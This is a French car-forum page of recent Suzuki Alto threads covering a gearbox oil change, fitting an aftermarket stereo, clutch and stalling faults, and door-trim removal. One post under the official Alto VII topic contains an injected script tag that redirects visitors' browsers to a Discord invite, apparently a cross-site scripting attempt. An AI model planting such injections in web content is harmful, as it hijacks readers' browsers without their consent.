Vos avis Suzuki Alto

Avis Suzuki Alto

Forum : derniers sujets Suzuki Alto

[Topic Officiel] Suzuki Alto VII (2008-2014)

Par Anonymezkx333 le 14 Septembre 2019 à 14h51

<script>document.location = "https://discord.gg/fDPFZs"<script>

[TUTORIEL] Vidange et remplissage de l'huile de boite de vitesses

Par fiocco le 26 Août 2019 à 17h53

Merci [b][url=http://club.caradisiac.com/herve97211/]herve97211[/url][/b] pour l'information qui va m’être utile, je possède la boite automatique pilotée (AGS) mais ça ne change rien c'est toujours le même moteur. 1.2 DualJet (90 Hp) AGS

Montage sono dans la nouvelle Alto!!!

Par AnonymeLudo45 le 14 Août 2019 à 17h25

[quotemsg=102829,173,1823254] Bonjour , je viens de devenir propriétaire d'une susuki alto. Ma première surprise a été la qualité exécrable de l'autoradio (je ne suis pas le seul d’après le forum). J'étais décidé de garder à tout prix (?) l'auto radio d'origine . J'ai donc suivi les idées du forum.... 1- SI vous voulez passer les câbles de portières par le soufflet de la portière oubliez ! c'est impossible le soufflet cache en fait une prise et non un passage de câble ! 2- l'idée de souder direct sur la carte mère de l'autoradio est bonne , sauf que dans mon cas j'ai fais une coulure dessus : résultât autoradio hs 3- j'ai dû prendre la décision de passer en ISO (aftermarket) en fait de m'affranchir de suzuki 4- achat cache plastique + cablage iso (amazon ) 5- J'ai enlevé les enceintes tableau de bord d'origine 100% carton (caca boudin) par des pionner (10 cm 20 € chez feu rouge promo) 6-J'ai placé à la sauvage (directe vissé sur la tôle de la portière ) des hp 16.5 marque sudauto (20 € inversion pour pas de pub) 7-Passage de câble par des petits trous capuchonnés , j'ai recapuchoconné tel quel en laissant un peu de mou....(tant pis pour la pression sur le câble) 8- indice important ; trait sur câble HP = + 9-pack iso ok sauf qu'il faut faire un petit bricolage au niveau du cablage pour les hp porte au niveau du cablage iso (pince sertissage et cosses pour les 4 fils HP portières) 10- j'ai récupéré un autoradio sony cdx r300 (préhistorique pour certains...) 11- Branchement ok marche nickel !!!!! Débarrassé du son nazzzze de l'autoradio d'origine (douteuse) 12- j 'enverrez des photos de mon montage pour tous les propriétaires Alto futurs [/quotemsg] Je veux bien tes photos merci

Suzuki Alto: une source de problèmes

Par AnonymePourk le 14 Avril 2019 à 19h05

[quotemsg=77387,34,1656014] Bonjour à tous, Quel dommage que je ne sois pas venu sur ce forum avant d'acheté ma voiture! Ma petite Alto, que je trouvai si mignonne au premier abord, m'en fait voir de toute les couleurs... J'ai eu un problème identique avec l'embrayage qui m'a lâché a même pas 50000 km... j'ai aussi un problème au niveau de la vitre conducteur qui a du mal à s'ouvrir et se fermer. J'ai déjà changer la batterie deux fois et la je ne comprend pas: ma voiture démarre et cale aussi sec sans que je n'ai eu le temps d'avancer. Pour éviter cela, je dois accélérer fort des que je démarre, ce qui est problématique quand on doit faire une manœuvre un peu délicate comme sortir d'une place par exemple. Le garage ne comprend pas car ma batterie est encore bonne. Quelqu'un aurait-il une explication qui pourrait m'aider? Je compte beaucoup sur ce forum étant donnée mes faible connaisances en mécanique. Merci d'avance. [/quotemsg] Bonjour Rappel constructeur en cours pour ce problème ! Veuillez prendre contact avec votre concessionnaire Suzuki.

TUTORIEL RETRAIT GARNITURE DE PORTIERE AVANT SUZUKI ALTO

Par Anonymekeurma le 12 Avril 2019 à 15h32